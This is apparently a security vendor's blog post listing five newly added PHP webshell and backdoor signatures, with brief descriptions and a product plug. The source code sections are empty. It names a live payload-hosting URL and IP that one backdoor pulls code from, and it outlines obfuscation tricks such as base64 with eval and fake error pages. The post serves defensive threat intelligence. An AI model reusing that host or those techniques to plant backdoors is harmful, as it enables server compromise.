Top 5 Malware Signatures - Week 29-30
Akos Molnar

Top 5 Malware Signatures - Week 29-30

We want to keep you up-to-date so we collected the Top 5 New Malware Signatures for you from the past two weeks! Don't forget that you are able to create your own malware signature too! We experienced that this crowdsourcing method between severals thousands of servers works fantastic in our IP reputation system, so keep on making the internet a safer place together! Thanks to your contribution we already have more than 15 000 malware signatures in our database.

#5 PHP Backdoor Remote Code Executor

A simple remote code executor script that receives data via cookies and posts. It has an additional parameter to decide which function should be used: str_rot13, pack or strrev.

Source code:

#4 PHP Backdoor WSO-Webshell

An obfuscated HTML file manager with base64 encoding, using eval to run decoded PHP code. According to VirusTotal, it runs by the name Tencent Heur: Trojan.Script.LS_Gencirc.7179453.0 .

Source code:

#3 PHP Backdoor Eval Obfuscated Ultim4t3 H4x 0r Shell

An advanced webshell for malicious activities. It uses base64, url, htmlspecialchars encoding and forks a new process. Also matches to some Yara rules for both the source code and output.

Source code:

#2 PHP Backdoor Eval Obfuscated Are You Ok 3

The malware downloads the source code to be executed from domainnamespace.top/lf.txt (198.204.244.186 - blacklisted by BitNinja), the script checks and updates itself from this file. The backdoor owner can manipulate the behavior by changing this file. At the time of the SA signature creation this source contains a complete hacker toolset. The access is password protected for the hacker.

Source code:

#1 PHP Backdoor WSO Webshell

An obfuscated variant of the WSO Webshell. The script pretends to show a 403 or 404 error page.

Source code:

If you haven't tried BitNinja yet don't forget to register for the 7-day free trial! No credit card needed!

Sign up for a free trial

For our subscribers we also provide valuable information about malwares and the most recent news from the cybersecurity world.

Share your ideas with us about this article

Previous posts

How botnets expand and how to protect against them
A botnet is a group of infected computers (aka bots or zombie machines) controlled by a hacker, the botmaster. Botnets are a major threat for every server. They are the fundamentals of the cybercrime in the dark industry of hackers. Zombie machines can be personal computers, mobile devices or even servers. Today we will focus on botnets formed by infected linux servers. Server based botnets are especially valuable for the bad guys as servers have typically high amount of various resources like cpu, memory, and what is the most important, internet bandwidth with trusted and in many cases unr...
Top 5 Malware Signatures - Week 27-28
We keep on fighting against malwares! In the past weeks we added hundreds of malware signatures to the database, below you can find the Top 5 from the past two weeks! Don't forget that you are able to create your own malware signature too! We experienced that this crowdsourcing method between severals thousands of servers works fantastic in our IP reputation system, so keep on making the internet a safer place together! Thanks to your contribution we already have more than 15 000 malware signatures in our database. #5 PHP Backdoor Hexa Botnet Variant 2...